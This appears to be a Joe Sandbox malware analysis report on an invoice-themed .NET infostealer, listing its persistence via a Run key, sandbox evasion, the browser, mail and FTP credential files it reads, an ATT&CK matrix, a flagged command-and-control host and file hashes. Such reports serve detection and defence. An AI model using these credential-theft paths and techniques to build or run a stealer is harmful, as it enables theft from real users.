                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594315Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593968Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593421Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Window / User API: threadDelayed 7534
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Window / User API: threadDelayed 2313
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Window / User API: threadDelayed 3009
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Window / User API: threadDelayed 6807
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Window / User API: threadDelayed 4279
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Window / User API: threadDelayed 5537
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -593859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -593750s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -593640s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -593531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1996Thread sleep time: -593421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Thread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Thread delayed: delay time: 600000
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4484601208.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2240163674.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4484313383.0000000000D47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Process created: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe "C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q8<b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>{Win}THbq
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q?<b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>{Win}r{Win}rTHbq
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR]q
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <html>Time: 01/15/2025 08:20:38<br>User Name: user<br>Computer Name: 724536<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.189<br><hr><b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>{Win}r{Win}r</html>
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q><b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>{Win}r{Win}THbq
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q9<b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>{Win}rTHbq
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q3<b>[ Program Manager]</b> (31/12/2024 12:01:23)<br>
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Queries volume information: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.4487080897.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.4486848273.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.4486848273.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.2241640405.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Statement of Account - USD 16,720.00.exe PID: 4828, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Statement of Account - USD 16,720.00.exe PID: 1288, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: adobe.exe PID: 7116, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: adobe.exe PID: 6292, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                    Remote Access Functionality

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.4487080897.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.4486848273.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.4486848273.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.2241640405.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Statement of Account - USD 16,720.00.exe PID: 4828, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Statement of Account - USD 16,720.00.exe PID: 1288, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: adobe.exe PID: 7116, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: adobe.exe PID: 6292, type: MEMORYSTR
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Software Packing | NTDS | 211 Security Software Discovery | Distributed Component Object Model | 21 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 2 Process Discovery | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Hidden Files and Directories | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                    Behavior Graph (figure not reproduced): ID: 1582790; Sample: Statement of Account - USD ...; Startdate: 31/12/2024; Architecture: WINDOWS; Score: 100

                    Source | Detection | Scanner | Label
                    Statement of Account - USD 16,720.00.exe | 34% | Virustotal |
                    Statement of Account - USD 16,720.00.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal
                    Statement of Account - USD 16,720.00.exe | 100% | Avira | HEUR/AGEN.1306767
                    Statement of Account - USD 16,720.00.exe | 100% | Joe Sandbox ML |

                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe | 100% | Avira | HEUR/AGEN.1306767
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal

                    No Antivirus matches
                    No Antivirus matches

                    Source | Detection | Scanner | Label
                    http://s4.serv00.com | 0% | Avira URL Cloud | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    api.ipify.org | 104.26.12.205 | true | false | | high
                    s4.serv00.com | 213.189.52.181 | true | true | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.ipify.org/ | false | | high

                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://api.ipify.org | Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://account.dyn.com/ | Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
                    https://api.ipify.org/t | Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://s4.serv00.com | Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000290C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                  IP | Domain | Country | ASN | ASN Name | Malicious
                                  104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
                                  213.189.52.181 | s4.serv00.com | Poland | 57367 | ECO-ATMAN-PLECO-ATMAN-PL | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1582790
                                  Start date and time:2024-12-31 14:01:06 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 34s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:11
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Statement of Account - USD 16,720.00.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@11/2@2/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 221
                                  • Number of non-executed functions: 20
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212, 13.107.246.45
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  Time | Type | Description
                                  08:01:55 | API Interceptor | 7365586x Sleep call for process: Statement of Account - USD 16,720.00.exe modified
                                  08:02:09 | API Interceptor | 5926229x Sleep call for process: adobe.exe modified
                                  14:01:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                                  14:02:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                                                Process:C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):486912
                                                Entropy (8bit):7.480821743600628
                                                Encrypted:false
                                                SSDEEP:6144:Y9yYMqdl+a/ZNntauGBOaYcR/uVc3fTlAoOjlrrhTFInd6Xcfg9UJU8:2dMqdl+YZNorUVcvWoOJFTWndm+
                                                MD5:CF173CA1DB13DFC7237FD33630926B65
                                                SHA1:783E42E20DA75EA1A2FD7A02E3824F251F26CF4F
                                                SHA-256:1B9D152C5CD6E2904ADA0CA707DBD2BB089AC59F8B07723490552A000848CC54
                                                SHA-512:31A7210E2EF813763225C39F5C42F00CD7899539755FD090E256AB17A16C88238E9A659BED9CF4BFD9F5BCB310FB850A6E2E04C41AAF1F2F8FD98DB99FA8ADDC
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Reputation:low
                                                Process:C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.480821743600628
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Statement of Account - USD 16,720.00.exe
                                                File size:486'912 bytes
                                                MD5:cf173ca1db13dfc7237fd33630926b65
                                                SHA1:783e42e20da75ea1a2fd7a02e3824f251f26cf4f
